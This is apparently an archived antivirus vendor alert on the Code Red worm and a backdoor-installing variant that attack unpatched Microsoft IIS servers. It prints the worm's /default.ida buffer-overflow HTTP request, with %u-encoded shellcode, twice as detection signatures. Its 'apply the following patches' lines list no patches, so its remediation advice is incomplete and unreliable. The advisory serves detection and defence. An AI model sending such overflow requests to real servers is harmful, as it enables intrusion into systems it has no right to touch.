|
|
||||||||||||||
|
|
|
Security Alert: Code Red - Updated 03/11/2003 New Variant: Code Red F Variant
This version of Code Red has all of the characteristics of the original virus, differing only by two bytes from the original. Command AntiVirus version 4.58.3 or higher will detect and disinfect the virus. Name: Code Red Variant
Description:
This variant of the original Code Red worm was discovered on August 4, 2001. It uses the same buffer overflow vulnerability as the original to spread, but also has the ability to install a backdoor trojan onto the infected system. This allows any interested parties to have remote access to the infected system's web server. /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a Detection of Backdoor Trojan: Command Antivirus version 4.58.3 or higher with definition files dated 08/07/01 will detect this virus as a security risk or as a "backdoor" trojan. Solution: Apply the following patches, available on the Microsoft website: Name: Code Red
Description:
Code Red affects systems running an unpatched version of Microsoft Windows NT 4.0 and Windows 2000 with IIS 4.0 or 5.0. The worm is able to exploit a known buffer overflow vulnerability by sending its code as an HTTP request to its victim. /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%u cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00 %u531b%u53 Solution: Apply the following patch, made available by Microsoft.
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||